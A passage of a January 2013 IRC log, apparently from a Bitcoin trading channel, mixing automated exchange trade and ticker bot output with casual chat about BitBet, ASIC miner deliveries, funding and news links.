[S.MPOE] 2029 @ 0.00066617 = 1.3517 BTC [-] Jan 19 18:18:08 [BTCTC] [BASIC-MINING] 7 @ 0.339 = 2.373 BTC [+] Jan 19 18:21:18 jurov: please see pm Jan 19 18:23:42 [MPEX] [S.MPOE] 4321 @ 0.00067472 = 2.9155 BTC [+] Jan 19 18:23:44 [MPEX] [S.MPOE] 18379 @ 0.00067483 = 12.4027 BTC [+] Jan 19 18:24:13 [BTCTC] [RSM] 2 @ 0.0095 = 0.019 BTC [+] Jan 19 18:25:16 [BTCTC] [RSM] 15 @ 0.0096 = 0.144 BTC [+] Jan 19 18:26:37 [BTCTC] [RSM] 1 @ 0.0096 BTC [+] **** BEGIN LOGGING AT Sun Jan 20 05:25:34 2013 Jan 20 05:31:12 mircea_popescu I SUMMON THEE FROM THE DEPTHS Jan 20 05:31:26 ya well you're late. Jan 20 05:31:40 heh Jan 20 05:33:09 how much for mpex historical data? Jan 20 05:34:14 mmm Jan 20 05:35:02 [MPEX] [S.MPOE] 16500 @ 0.00064778 = 10.6884 BTC [-] Jan 20 05:44:04 .01 btc sound good? Jan 20 05:48:05 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Jan 20 05:50:44 I don't know, but I just got .01 btc... It does sound good. Jan 20 05:51:21 [MPEX] [S.DICE] 150 @ 0.00494 = 0.741 BTC [-] Jan 20 05:51:23 [MPEX] [S.DICE] 550 @ 0.00493999 = 2.717 BTC [-] Jan 20 05:51:54 i just wrote like... the best short story ever. Jan 20 05:51:59 way better than bitdust. Jan 20 05:52:06 I won't have credits for it. Jan 20 05:55:45 [MPEX] [S.DICE] 3184 @ 0.00507063 = 16.1449 BTC [+] Jan 20 05:55:47 [MPEX] [S.DICE] 500 @ 0.00514651 = 2.5733 BTC [+] Jan 20 05:55:48 [MPEX] [S.DICE] 1316 @ 0.00525531 = 6.916 BTC [+] Jan 20 05:56:31 [MPEX] [S.DICE] 3008 @ 0.00525531 = 15.808 BTC [+] Jan 20 05:56:33 [MPEX] [S.DICE] 992 @ 0.00525532 = 5.2133 BTC [+] Jan 20 05:57:14 [MPEX] [S.DICE] 400 @ 0.00525532 = 2.1021 BTC [+] Jan 20 05:57:24 ;;ticker Jan 20 05:57:24 BTCUSD ticker | Best bid: 15.57000, Best ask: 15.61499, Bid-ask spread: 0.04499, Last trade: 15.57000, 24 hour volume: 20902.91243534, 24 hour low: 15.27001, 24 hour high: 15.61500, 24 hour vwap: 15.47657 Jan 20 05:57:27 !ticker m s.dice Jan 20 05:57:29 [MPEX:S.DICE] 1D: 0.00454708 / 0.00500362 / 0.00535392 (55566 shares, 278.03 BTC), 7D: 0.00449034 / 0.00477018 / 0.00598999 (1986599 shares, 9,476.44 BTC), 30D: 0.0014 / 0.0037446 / 0.00598999 (11157599 shares, 41,780.77 BTC) Jan 20 05:57:30 !ticker m s.mpoe Jan 20 05:57:31 [MPEX:S.MPOE] 1D: 0.00064121 / 0.00065882 / 0.00068 (2098853 shares, 1,382.77 BTC), 7D: 0.00062772 / 0.0006624 / 0.00068 (11115137 shares, 7,362.68 BTC), 30D: 0.000612 / 0.00064431 / 0.00068 (40468984 shares, 26,074.72 BTC) Jan 20 05:57:57 financial stability in btc! Jan 20 05:58:02 [MPEX] [S.DICE] 240 @ 0.00525532 = 1.2613 BTC [+] Jan 20 06:06:12 i wanna read your short story mircea_popescu Jan 20 06:06:37 so go ahead Jan 20 06:06:50 where is it? Jan 20 06:07:23 [MPEX] [S.MPOE] 8395 @ 0.00064778 = 5.4381 BTC [-] Jan 20 06:07:29 who the fuck is this inaba? Jan 20 06:07:43 on my blog lol. Jan 20 06:08:07 also, milk http://polimedia.us/dtng/c/src/135865433992.jpg Jan 20 06:08:25 she has weird nipples Jan 20 06:08:32 I shall nickname her nips Jan 20 06:14:00 she does. Jan 20 06:15:19 when will bitbet have bookies Jan 20 06:15:22 I want to bet on all da sports Jan 20 06:16:37 so what's keeping you ? Jan 20 06:18:10 Would be better with automated bets for all events Jan 20 06:18:21 where is your blog? Jan 20 06:19:49 Chilca http://trilema.com/ Jan 20 06:19:58 Namworld what's keeping someone from making a bot ? Jan 20 06:19:59 mircea_popescu: Thx Jan 20 06:20:31 Chilca it's a general/personal blog but it has some dedicated bitcoin/mpex/rota categories. Jan 20 06:20:39 eh, I don't know, what purpose would it serve to the creator? Jan 20 06:24:47 "Hey! Java still rules and will exist long after c# is gone..." Jan 20 06:24:52 bejesus the forum... hard to believe. Jan 20 06:25:16 Namworld is it supposed to be useful or not useful, this thing you propose ? Jan 20 06:27:22 automated bets Jan 20 06:27:45 hmm Jan 20 06:27:54 the betting line is set p2p almost Jan 20 06:28:01 so there is no need for automated bets Jan 20 06:28:29 mircea_popescu: the odds are based on the total pot for a bet right? Jan 20 06:29:12 well there's no explicit odds Jan 20 06:29:40 but you can calculate momentary odds as yes / no Jan 20 06:30:01 yea that's what I was asking Jan 20 06:30:08 actually makes it so the bookie can't rig the odds.. Jan 20 06:30:22 it's as ingenius as the futures on the network difficulty... Jan 20 06:33:51 ;) Jan 20 06:34:02 funny Jan 20 06:34:27 the simplest ideas are the most powerful when implemented correctly: "fundamentals are the key to winning the game, not showmanship" Jan 20 06:36:28 myeah. Jan 20 06:39:37 "you know you've done things right, when people think you haven't done anything at all" Jan 20 06:52:44 mircea: If done by bitbet for bitbet, it's supposed to help in that bets for sporting events are readily available. Jan 20 06:53:19 Plus they can probably be awarded without any further work if automated. Jan 20 06:53:25 Don't they have feeds for that? Jan 20 06:53:35 [MPEX] [S.MPOE] 4321 @ 0.00065465 = 2.8287 BTC [+] Jan 20 06:53:35 [MPEX] [S.MPOE] 7279 @ 0.00065485 = 4.7667 BTC [+] Jan 20 06:57:19 Namworld and if done by a third party, it allows them to make whatever money is t obe made in that market. Jan 20 06:58:44 mircea_popescu: then why not better organize the bets as bitbet grows... Jan 20 06:58:50 even reddit has subreddits... Jan 20 06:59:05 there are categories atm, and a search. but in general... yea Jan 20 06:59:14 just have to figure out the optimal approach Jan 20 07:00:32 sports bets will likely account for a large part of bitbets bottom line Jan 20 07:01:12 since it circumvents the legality of sports gambling in many places Jan 20 07:02:06 so far bottom line is bfl Jan 20 07:02:21 for now but that's not replicable...wait until baseball season Jan 20 07:02:51 it's also going to be pretty awesome if BFL fails to deliver, such bad press... Jan 20 07:02:57 (given the bet that is) Jan 20 07:03:46 i guess Jan 20 07:03:56 even money so far on it. actually no, looky, yes prevails. lol. Jan 20 07:04:02 some people stand to make a pretty penny. Jan 20 07:06:52 why has no one secured legitimate funding and business planning for ASIC development? Jan 20 07:07:53 [MPEX] [S.MPOE] 7247 @ 0.00065485 = 4.7457 BTC [+] Jan 20 07:07:54 [MPEX] [S.MPOE] 14900 @ 0.00065711 = 9.7909 BTC [+] Jan 20 07:07:55 [MPEX] [S.MPOE] 9051 @ 0.00065797 = 5.9553 BTC [+] Jan 20 07:09:59 thestringpuller probably because the scammers active have managed to suck up most of the capital available for that. Jan 20 07:10:53 yet VC's have sunk 4.5 million into various btc businesses... Jan 20 07:11:05 that capital being external to the btc system Jan 20 07:11:09 people use the term vc too liberqally. Jan 20 07:11:15 coinbase had vc funding. Jan 20 07:11:20 bitinstant Jan 20 07:11:29 everyone else had angel funding (mtgox, bitinstant etc) Jan 20 07:11:33 bitpay is on the list now (even though that was angel funding) Jan 20 07:11:36 the rest, (basic scl) had who knows what Jan 20 07:11:47 who signed bitinstant ? Jan 20 07:11:48 but that capital was in fiat not btc Jan 20 07:12:41 it doesn't say Jan 20 07:13:57 i guess my question is why have Coinbase and others successfully acquired funding and formed what seems to be "profitable businesses" yet these hardware manufacturers make AAPL's first office (Job's adoptive mom's garage) look like a better option for hardware fabrication... Jan 20 07:14:23 and who the fuck is this inaba? Jan 20 07:15:22 if it doesn't say it's either angel capital or pr (ie, fake) Jan 20 07:16:03 inaba is some bfl spokesperson. tho he's never been oficially credentialed afaik (unlike mpoe-pr) Jan 20 07:16:11 so basically, he's mostly just another forum loudmouth. Jan 20 07:18:26 the forum is trash...jesus Jan 20 07:18:30 what the fuck am I reading Jan 20 07:19:03 you should raise the girls' pay rate Jan 20 07:19:09 to deal with this nonsense Jan 20 07:19:19 http://www.guardian.co.uk/technology/2013/jan/18/kim-dotcom-fight-internet-freedom Jan 20 07:19:28 incredible how huge this guy is Jan 20 07:19:30 check the pic Jan 20 07:20:16 "Before his arrest in New Zealand, he was the world's number one-ranked Modern Warfare 3 player out of more than 15 million online players." Jan 20 07:20:29 lol Jan 20 07:20:51 i'm surprised that hasn't shown up on TIL on reddit Jan 20 07:23:03 people are pretty srs about their video games Jan 20 07:23:13 have you ever seen these bro's play golden tee? Jan 20 07:23:37 yea Jan 20 07:23:42 play it like real golf and shit Jan 20 07:24:16 haha Jan 20 07:25:33 mircea_popescu: so...btc-zon [done] ; btc-betting [done] ; btc-lottery [done] Jan 20 07:25:36 what's next? Jan 20 07:25:59 hm ? Jan 20 07:26:42 o, desktop AA battery. http://trilema.com/2013/since-you-boys-are-printing-tanks-now/ Jan 20 07:28:11 mpoe-pr: " there's so much to do and so few people capable of doing it in Bitcoin that if your plan makes sense and you seem even remotely competent everyone else who is competent will breathe a sigh of relief." Jan 20 07:28:21 deja-vu... Jan 20 07:29:31 myea Jan 20 07:29:42 I built a drone already... Jan 20 07:29:42 [MPEX] [S.MPOE] 4321 @ 0.00064782 = 2.7992 BTC [-] Jan 20 07:29:43 [MPEX] [S.MPOE] 3197 @ 0.00064778 = 2.071 BTC [-] Jan 20 07:29:48 it's part of my plan to take over detroit Jan 20 07:29:48 [MPEX] [S.MPOE] 8482 @ 0.00064565 = 5.4764 BTC [-] Jan 20 07:30:00 I just need to arm it with something Jan 20 07:30:05 Then I can be Obama. Jan 20 07:55:07 [MPEX] [S.MPOE] 5136 @ 0.00064565 = 3.3161 BTC [-] Jan 20 07:55:09 [MPEX] [S.MPOE] 11029 @ 0.00064519 = 7.1158 BTC [-] Jan 20 08:36:07 [MPEX] [S.DICE] 1000 @ 0.00501039 = 5.0104 BTC [-] Jan 20 08:36:10 [MPEX] [S.DICE] 2900 @ 0.00501038 = 14.5301 BTC [-] Jan 20 08:36:24 [MPEX] [S.DICE] 990 @ 0.00493999 = 4.8906 BTC [-] Jan 20 08:47:39 [MPEX] [S.MPOE] 12171 @ 0.00064519 = 7.8526 BTC [-] Jan 20 09:07:43 http://www.guardian.co.uk/money/2013/jan/13/investments-stock-picking Jan 20 09:08:03 cat wins at investing Jan 20 09:46:12 leotreasure the "modern money theory" idiots are getting pretty despreate by now eh ? Jan 20 09:49:38 [MPEX] [S.MPOE] 4900 @ 0.00064125 = 3.1421 BTC [-] Jan 20 10:09:21 [MPEX] [S.MPOE] 8650 @ 0.00064125 = 5.5468 BTC [-] Jan 20 10:09:23 [MPEX] [S.MPOE] 250 @ 0.00063997 = 0.16 BTC [-] Jan 20 10:18:59 [MPEX] [S.DICE] 1750 @ 0.0048811 = 8.5419 BTC [-] Jan 20 10:53:14 [MPEX] [S.MPOE] 17496 @ 0.0006418 = 11.2289 BTC [+] Jan 20 10:53:16 [MPEX] [S.MPOE] 1504 @ 0.00064029 = 0.963 BTC [-] Jan 20 11:06:24 http://www.youtube.com/watch?v=C4SnUObMd0o Jan 20 11:06:36 i never laughed so uncontrollably Jan 20 11:09:05 http://www.youtube.com/watch?v=y-Fb1wYODTY Jan 20 11:10:31 lol! Jan 20 11:23:10 [BTCTC] [GSDPT] 8 @ 0.006 = 0.048 BTC [-] Jan 20 11:23:54 [BTCTC] [GSDPT] 2 @ 0.006 = 0.012 BTC [-] Jan 20 11:25:14 [MPEX] [S.MPOE] 8300 @ 0.00064189 = 5.3277 BTC [+] Jan 20 11:27:54 https://www.youtube.com/watch?v=idDCom9fHpM&t=1m40s Jan 20 11:46:25 [MPEX] [S.MPOE] 6132 @ 0.00064029 = 3.9263 BTC [-] Jan 20 11:46:27 [MPEX] [S.MPOE] 23950 @ 0.00063997 = 15.3273 BTC [-] Jan 20 11:46:28 [MPEX] [S.MPOE] 26950 @ 0.00063985 = 17.244 BTC [-] Jan 20 11:48:13 [MPEX] [S.DICE] 1779 @ 0.00481977 = 8.5744 BTC [-] Jan 20 11:48:14 [MPEX] [S.DICE] 800 @ 0.00492685 = 3.9415 BTC [+] Jan 20 11:48:15 [MPEX] [S.DICE] 4346 @ 0.00525494 = 22.838 BTC [+] Jan 20 12:04:42 [MPEX] [S.MPOE] 3900 @ 0.00063899 = 2.4921 BTC [-] Jan 20 12:04:44 [MPEX] [S.MPOE] 8900 @ 0.00063886 = 5.6859 BTC [-] Jan 20 12:12:59 [MPEX] [S.MPOE] 23601 @ 0.00064189 = 15.1492 BTC [+] Jan 20 12:27:15 [MPEX] [S.MPOE] 5899 @ 0.00064189 = 3.7865 BTC [+] Jan 20 12:27:17 [MPEX] [S.MPOE] 5051 @ 0.00064342 = 3.2499 BTC [+] Jan 20 12:33:54 https://bitcointalk.org/index.php?topic=137149.0 i can't discern if troll or ? Jan 20 12:39:41 Seen his site? Most definitely troll Jan 20 12:40:15 I can tell from the pixels and from the 'pirate@40' on the guys hat Jan 20 12:40:24 so stupid could be honest Jan 20 12:42:18 More important is, will your exchange host his IPO? Jan 20 12:44:14 o, absolutely. Jan 20 12:44:17 i hope he picks mpex. Jan 20 12:50:27 [MPEX] [S.MPOE] 5716 @ 0.00063886 = 3.6517 BTC [-] Jan 20 12:50:29 [MPEX] [S.MPOE] 7864 @ 0.00063853 = 5.0214 BTC [-] Jan 20 12:50:30 [MPEX] [S.MPOE] 8600 @ 0.00063842 = 5.4904 BTC [-] Jan 20 12:50:31 [MPEX] [S.MPOE] 4870 @ 0.00063778 = 3.106 BTC [-] Jan 20 12:54:50 [MPEX] [S.MPOE] 14030 @ 0.00063778 = 8.9481 BTC [-] Jan 20 12:54:52 [MPEX] [S.MPOE] 7773 @ 0.00063757 = 4.9558 BTC [-] Jan 20 12:54:53 [MPEX] [S.MPOE] 10900 @ 0.00063738 = 6.9474 BTC [-] Jan 20 12:54:55 [MPEX] [S.MPOE] 10597 @ 0.00063733 = 6.7538 BTC [-] Jan 20 12:57:43 [MPEX] [S.MPOE] 11178 @ 0.00064342 = 7.1921 BTC [+] Jan 20 12:57:45 [MPEX] [S.MPOE] 5239 @ 0.00064688 = 3.389 BTC [+] Jan 20 13:36:02 Anyone else having issue logging into Bitfunder? I keep getting "Google 2-Factor incorrect or not provided" despite putting in my code... Jan 20 13:36:44 clock on your device off ? Jan 20 13:37:04 doesn't seem to be Jan 20 13:48:24 hmm Jan 20 13:50:03 works fine here Jan 20 13:50:16 servers are ntp synced properly Jan 20 13:51:23 I was just able to log in; don't think I was having a time sync issue on my phone... Hmm Jan 20 14:12:01 [MPEX] [S.MPOE] 2861 @ 0.00063733 = 1.8234 BTC [-] Jan 20 14:12:13 [MPEX] [S.MPOE] 21000 @ 0.00063731 = 13.3835 BTC [-] Jan 20 14:12:15 [MPEX] [S.MPOE] 20036 @ 0.00063594 = 12.7417 BTC [-] Jan 20 14:19:26 [MPEX] [S.MPOE] 6164 @ 0.00063594 = 3.9199 BTC [-] Jan 20 14:19:28 [MPEX] [S.MPOE] 5586 @ 0.00063543 = 3.5495 BTC [-] Jan 20 14:30:31 jurov https://bitcointalk.org/index.php?topic=137342.msg1465719#msg1465719 Jan 20 14:30:36 must troll moar. Jan 20 14:32:14 hi, i fail to see a point? Jan 20 14:33:16 a ok Jan 20 14:33:22 if it's about mpoe-pr, i already have chosen this: https://bitcointalk.org/index.php?topic=136953.msg1463866#msg1463866 Jan 20 14:33:44 it's a bit longer, but perfect otherwise. Jan 20 14:33:47 heh Jan 20 14:33:56 yeah, i see it. Jan 20 14:34:18 clear context, opinion about "securities", contempt for idiots Jan 20 14:35:02 not to mention she's kicking a kid. Jan 20 14:35:09 which is almost as bad as a puppy Jan 20 14:38:30 [BTCTC] [BTC-BOND] 700 @ 0.01 = 7 BTC [+] Jan 20 14:40:05 http://www.youtube.com/watch?v=27ugSKW4-QQ Jan 20 14:40:39 >,> *kicks a puppy to the side* Jan 20 14:41:02 someone should list porn studio on btct. or boob enhancement Jan 20 14:41:27 PAMELA.BOND Jan 20 14:41:37 jurov actually there's a large contingent of people who are doing dubious porn Jan 20 14:41:44 they're going to be on btc sooner or later. Jan 20 14:41:59 since it solves their only problem, ie payments. Jan 20 14:42:19 yea i know about girlsgonebitcoin... but they need to institutionalize Jan 20 14:42:26 a, tghat's bs, will never work. Jan 20 14:42:42 nobody who has btc pays for porn, let's get real. Jan 20 14:43:14 http://rule34.paheal.net/wiki/Notes that sort of stuff. Jan 20 14:43:49 PAYPAL ISSUE Jan 20 14:43:49 So paypal have now closed ALL of my accounts. Including ones that arent even associated with paheal in any way. This is very unfortunate as it effects every aspect of the running of the site. We recieve our advertising money via paypal and pay the server bills via paypal too. Jan 20 14:50:31 [MPEX] [S.MPOE] 9114 @ 0.00063543 = 5.7913 BTC [-] Jan 20 14:50:33 [MPEX] [S.MPOE] 2200 @ 0.00063413 = 1.3951 BTC [-] Jan 20 14:50:34 [MPEX] [S.MPOE] 12901 @ 0.00063288 = 8.1648 BTC [-] Jan 20 14:50:39 [MPEX] [S.MPOE] 5885 @ 0.00063222 = 3.7206 BTC [-] Jan 20 14:53:40 [MPEX] [S.DICE] 266 @ 0.00525494 = 1.3978 BTC [+] Jan 20 14:53:42 [MPEX] [S.DICE] 1134 @ 0.00525495 = 5.9591 BTC [+] Jan 20 14:57:41 mircea_popescu: your site, or are you quoting? Jan 20 15:00:34 booo --- avalon-asics.com is now into -1 / -1 / -1 / -33... Jan 20 15:00:51 jurov: LOL Jan 20 15:06:53 markedathome from that url Jan 20 15:07:06 awww, avalon didn't deliver either ? teh shock Jan 20 15:11:27 ;;bc,stats Jan 20 15:11:29 Current Blocks: 217281 | Current Difficulty: 3249549.5844872 | Next Difficulty At Block: 217727 | Next Difficulty In: 446 blocks | Next Difficulty In About: 3 days, 9 hours, 46 minutes, and 0 seconds | Next Difficulty Estimate: 2932431.99782366 | Estimated Percent Change: -9.75881667347 Jan 20 15:17:04 mircea_popescu: they have shipped 1 to jgarzik. https://bitcointalk.org/index.php?topic=137534 Jan 20 15:17:48 and is now finding the substrata gif amusing Jan 20 15:18:31 lol ya, right. Jan 20 15:18:33 [MPEX] [S.MPOE] 20964 @ 0.00064293 = 13.4784 BTC [+] Jan 20 15:18:35 [MPEX] [S.MPOE] 1036 @ 0.00064688 = 0.6702 BTC [+] Jan 20 15:18:47 because that's exactly how you ship something like that. Jan 20 15:22:52 now we need tracking number to jgarzik so that we can see a countdown to delivery, then a countdown to unboxing vid, countdown to powerup and mining vid, then countdown to teardown and post of BOM Jan 20 15:23:24 lol Jan 20 15:23:37 i'll just watch the th figure. Jan 20 15:23:54 which, in fairness, IS up a little Jan 20 15:40:32 [MPEX] [S.MPOE] 9425 @ 0.00064688 = 6.0968 BTC [+] Jan 20 15:40:33 [MPEX] [S.MPOE] 5825 @ 0.00064749 = 3.7716 BTC [+] Jan 20 15:47:47 [MPEX] [S.DICE] 1400 @ 0.00518191 = 7.2547 BTC [-] Jan 20 16:19:25 [MPEX] [S.DICE] 2100 @ 0.00518191 = 10.882 BTC [-] Jan 20 16:29:34 SCIENCE NEVER FAILS Jan 20 16:36:37 mircea_popescu: I SUMMON THEE Jan 20 16:38:09 thestringpuller, you should also properly banish him in the end of seance Jan 20 16:38:44 and wear a funny hat Jan 20 16:42:50 mircea_popescu: https://wealthcycles.com/features/denial-of-service-attacks-legal-for-high-frequency-traders-retail-orders-ignored Jan 20 16:46:50 [MPEX] [S.MPOE] 14362 @ 0.00064489 = 9.2619 BTC [-] Jan 20 16:48:37 myeah. Jan 20 16:48:46 a little longer than 50ms on mpex, but that's the general idea. Jan 20 16:53:26 yeah..."Your order could not be canceled at this time" Jan 20 16:53:41 when i saw that response from mpex i was like wat? Jan 20 16:53:44 [MPEX] [S.MPOE] 5401 @ 0.00064749 = 3.4971 BTC [+] Jan 20 16:54:58 dun dun dun Jan 20 17:08:01 [MPEX] [S.MPOE] 13500 @ 0.00064749 = 8.7411 BTC [+] Jan 20 17:09:55 http://polimedia.us/dtng/c/src/135869456354.gif << count the beads. it's called hashing. Jan 20 17:17:40 [MPEX] [S.MPOE] 25102 @ 0.00064621 = 16.2212 BTC [-] Jan 20 17:17:42 [MPEX] [S.MPOE] 9298 @ 0.0006458 = 6.0046 BTC [-] Jan 20 17:30:47 [MPEX] [S.MPOE] 1740 @ 0.0006458 = 1.1237 BTC [-] Jan 20 17:30:49 [MPEX] [S.MPOE] 15850 @ 0.00064376 = 10.2036 BTC [-] Jan 20 17:32:36 http://www.wired.com/threatlevel/2013/01/coder-charged-for-gambling-software/ Jan 20 17:32:52 !ticker mpex s.dice Jan 20 17:32:55 [MPEX:S.DICE] 1D: 0.00481977 / 0.00513077 / 0.00525532 (43896 shares, 225.22 BTC), 7D: 0.00449034 / 0.00477603 / 0.00598999 (1968947 shares, 9,403.76 BTC), 30D: 0.0014 / 0.00374694 / 0.00598999 (11171304 shares, 41,858.22 BTC) Jan 20 17:37:25 [MPEX] [S.MPOE] 17500 @ 0.00063314 = 11.08 BTC [-] Jan 20 17:37:27 [MPEX] [S.MPOE] 6715 @ 0.00063222 = 4.2454 BTC [-] Jan 20 17:37:28 [MPEX] [S.MPOE] 1385 @ 0.00063178 = 0.875 BTC [-] Jan 20 17:58:15 [MPEX] [S.MPOE] 5665 @ 0.00063178 = 3.579 BTC [-] Jan 20 17:58:17 [MPEX] [S.MPOE] 16950 @ 0.00063131 = 10.7007 BTC [-] Jan 20 17:58:18 [MPEX] [S.MPOE] 950 @ 0.00062783 = 0.5964 BTC [-] Jan 20 17:58:20 [MPEX] [S.MPOE] 4535 @ 0.00062776 = 2.8469 BTC [-] Jan 20 18:02:00 [MPEX] [S.BBET] 2000 @ 0.00100009 = 2.0002 BTC [-] Jan 20 18:02:05 [MPEX] [S.BBET] 8000 @ 0.00100008 = 8.0006 BTC [-] Jan 20 18:02:58 [MPEX] [S.MPOE] 25000 @ 0.00063865 = 15.9663 BTC [+] Jan 20 18:09:01 [MPEX] [S.MPOE] 5465 @ 0.00062776 = 3.4307 BTC [-] Jan 20 18:09:03 [MPEX] [S.MPOE] 2000 @ 0.0006277 = 1.2554 BTC [-] Jan 20 18:09:03 [MPEX] [S.MPOE] 2600 @ 0.00062636 = 1.6285 BTC [-] Jan 20 18:09:05 [MPEX] [S.MPOE] 5535 @ 0.00062626 = 3.4663 BTC [-] Jan 20 18:11:47 [MPEX] [S.MPOE] 3300 @ 0.00062626 = 2.0667 BTC [-] Jan 20 18:13:30 uf, quite a dump Jan 20 18:13:57 Back down to normal ipo Jan 20 18:14:05 to first tier ipo* Jan 20 18:17:44 [BTCTC] [RSM] 2 @ 0.0085 = 0.017 BTC [-] Jan 20 18:20:19 [MPEX] [S.DICE] 3100 @ 0.00505276 = 15.6636 BTC [-] Jan 20 18:34:13 [MPEX] [S.MPOE] 1188 @ 0.00062626 = 0.744 BTC [-] Jan 20 18:36:54 [MPEX] [S.DICE] 600 @ 0.0051797 = 3.1078 BTC [+] Jan 20 18:38:05 [MPEX] [S.MPOE] 4027 @ 0.00062626 = 2.5219 BTC [-] Jan 20 18:38:07 [MPEX] [S.MPOE] 323 @ 0.000626 = 0.2022 BTC [-] Jan 20 18:40:58 !ticker mpex s.dice Jan 20 18:40:59 [MPEX:S.DICE] 1D: 0.00481977 / 0.0051263 / 0.00525532 (47596 shares, 243.99 BTC), 7D: 0.00449034 / 0.00477662 / 0.00598999 (1971963 shares, 9,419.32 BTC), 30D: 0.0014 / 0.00374737 / 0.00598999 (11175004 shares, 41,876.99 BTC) Jan 20 18:57:19 [MPEX] [S.MPOE] 22000 @ 0.00063123 = 13.8871 BTC [+] Jan 20 19:02:11 [MPEX] [S.MPOE] 33565 @ 0.000626 = 21.0117 BTC [-] Jan 20 19:02:13 [MPEX] [S.MPOE] 2513 @ 0.00062544 = 1.5717 BTC [-] Jan 20 19:26:08 Ukto: you there? Jan 20 19:27:43 Ukto: nevermind Jan 20 19:33:34 [MPEX] [S.MPOE] 1837 @ 0.00062544 = 1.1489 BTC [-] Jan 20 19:33:36 [MPEX] [S.MPOE] 10400 @ 0.00062297 = 6.4789 BTC [-] Jan 20 19:33:37 [MPEX] [S.MPOE] 19924 @ 0.00062068 = 12.3664 BTC [-] Jan 20 19:36:38 [BTCTC] [COGNITIVE] 1 @ 0.4189 BTC [-] Jan 20 19:42:06 [MPEX] [S.MPOE] 4321 @ 0.00063095 = 2.7263 BTC [+] Jan 20 19:42:10 [MPEX] [S.MPOE] 17300 @ 0.00063123 = 10.9203 BTC [+] Jan 20 19:42:12 [MPEX] [S.MPOE] 8500 @ 0.00063239 = 5.3753 BTC [+] Jan 20 19:42:13 [MPEX] [S.MPOE] 30415 @ 0.00063865 = 19.4245 BTC [+] Jan 20 19:51:38 [MPEX] [S.MPOE] 4321 @ 0.00063539 = 2.7455 BTC [-] Jan 20 19:51:39 [MPEX] [S.MPOE] 20579 @ 0.00063563 = 13.0806 BTC [+] Jan 20 19:57:32 hi guys my son has been sick for a few days Jan 20 19:57:53 the case was discussed and iassume handled Jan 20 19:58:14 [MPEX] [S.MPOE] 4321 @ 0.00062907 = 2.7182 BTC [-] Jan 20 19:58:16 [MPEX] [S.MPOE] 46500 @ 0.00062892 = 29.2448 BTC [-] Jan 20 19:58:26 i'll be at the computer for about 5-6 hours and reachable Jan 20 19:58:26 EskimoBob_afk the hater returns Jan 20 19:58:39 with his marvelous market depth of less than 100 btcs Jan 20 19:58:40 mwahaha Jan 20 20:14:31 sup bitches' Jan 20 20:39:22 [BTCTC] [COGNITIVE] 1 @ 0.41 BTC [-] Jan 20 20:40:02 [BTCTC] [COGNITIVE] 1 @ 0.41 BTC [-] Jan 20 20:40:30 [BTCTC] [COGNITIVE] 1 @ 0.39 BTC [-] Jan 20 20:41:00 [HAVELOCK] [HIM] 1 @ 13.1 BTC [-] Jan 20 20:47:02 sup bitches' ... lol someone figured the assapi entrypoint? Jan 20 20:47:16 !ticker mp s.mpoe Jan 20 20:47:18 [MPEX:S.MPOE] 1D: 0.00062068 / 0.00064355 / 0.00066183 (1525055 shares, 981.45 BTC), 7D: 0.00062068 / 0.00066069 / 0.00068 (11958837 shares, 7,901.16 BTC), 30D: 0.000612 / 0.00064448 / 0.00068 (40838665 shares, 26,319.74 BTC) Jan 20 20:47:35 still better than overhyped mugs Jan 20 20:49:39 ;;ticker Jan 20 20:49:39 BTCUSD ticker | Best bid: 15.68000, Best ask: 15.69000, Bid-ask spread: 0.01000, Last trade: 15.68000, 24 hour volume: 26331.65039030, 24 hour low: 15.48512, 24 hour high: 15.89000, 24 hour vwap: 15.69493 Jan 20 20:49:45 we're stuck again arent we Jan 20 20:53:17 dunno Jan 20 20:53:22 avalon hasnt even shipped yet have they? Jan 20 20:53:40 [MPEX] [S.MPOE] 11110 @ 0.0006227 = 6.9182 BTC [-] Jan 20 20:55:05 Did BFL push the date back further? Jan 20 21:00:00 [HAVELOCK] [SDICE] 1 @ 0.58 BTC [-] Jan 20 21:00:59 [HAVELOCK] [SDICE] 10 @ 0.58 = 5.8 BTC [-] Jan 20 21:06:19 heh, friedcat is shipping a unit to me Jan 20 21:06:22 so Jan 20 21:06:32 at least we can prove those exist, even if the other three are failures Jan 20 21:07:12 should be early feb Jan 20 21:07:28 the chips have already been sent off to the board fabber to be mounted along with the rest of the components Jan 20 21:07:45 like, first week of feb, maybe second Jan 20 21:15:59 [HAVELOCK] [SDICE] 9 @ 0.58 = 5.22 BTC [-] Jan 20 21:21:59 [HAVELOCK] [SDICE] 1 @ 0.58 BTC [-] Jan 20 21:24:54 so there money to take here then http://bitbet.us/bet/34/an-asic-unit-from-either-bfl-avalon-or/ Jan 20 21:29:05 [MPEX] [S.DICE] 150 @ 0.00497115 = 0.7457 BTC [-] Jan 20 21:29:07 [MPEX] [S.DICE] 1200 @ 0.00497114 = 5.9654 BTC [-] Jan 20 21:29:08 [MPEX] [S.DICE] 694 @ 0.00492404 = 3.4173 BTC [-] Jan 20 21:29:09 [MPEX] [S.DICE] 656 @ 0.004901 = 3.2151 BTC [-] Jan 20 21:33:56 [MPEX] [S.DICE] 300 @ 0.00516344 = 1.549 BTC [+] Jan 20 21:38:03 kakobrekla: didn't avalon just ship? Jan 20 21:38:57 they say they've shipped, to jgarzik and bitcoin foundation. just needs one of them to confirm. Unknown how many other orders have been shipped. Jan 20 21:40:04 I'd like to know if fizzisist is doing an asic Jan 20 21:56:53 [MPEX] [S.DICE] 1150 @ 0.00516344 = 5.938 BTC [+] Jan 20 21:56:55 [MPEX] [S.DICE] 534 @ 0.0051819 = 2.7671 BTC [+] Jan 20 21:56:56 [MPEX] [S.DICE] 216 @ 0.00522625 = 1.1289 BTC [+] Jan 20 21:57:30 markedathome no Jan 20 21:57:38 two others are. Jan 20 21:59:12 a shame, seems to be a decent board maker, along with nghzang. ztex a close third. Jan 20 21:59:45 [MPEX] [S.MPOE] 90 @ 0.0006227 = 0.056 BTC [-] Jan 20 21:59:47 [MPEX] [S.MPOE] 4321 @ 0.00062101 = 2.6834 BTC [-] Jan 20 21:59:48 [MPEX] [S.MPOE] 744 @ 0.00062068 = 0.4618 BTC [-] Jan 20 21:59:49 [MPEX] [S.MPOE] 12598 @ 0.00061858 = 7.7929 BTC [-] Jan 20 21:59:53 as you said, boardmaker. Jan 20 22:01:10 man... wish i had some free capital for those S.MPOE shares Jan 20 22:03:08 lol my father just called, "son, 10k eur. buy. now." Jan 20 22:05:29 y? Jan 20 22:07:26 he liquidated some stocks and wants to put some something in b. Jan 20 22:07:33 !ticker mpex s.dice Jan 20 22:07:35 [MPEX:S.DICE] 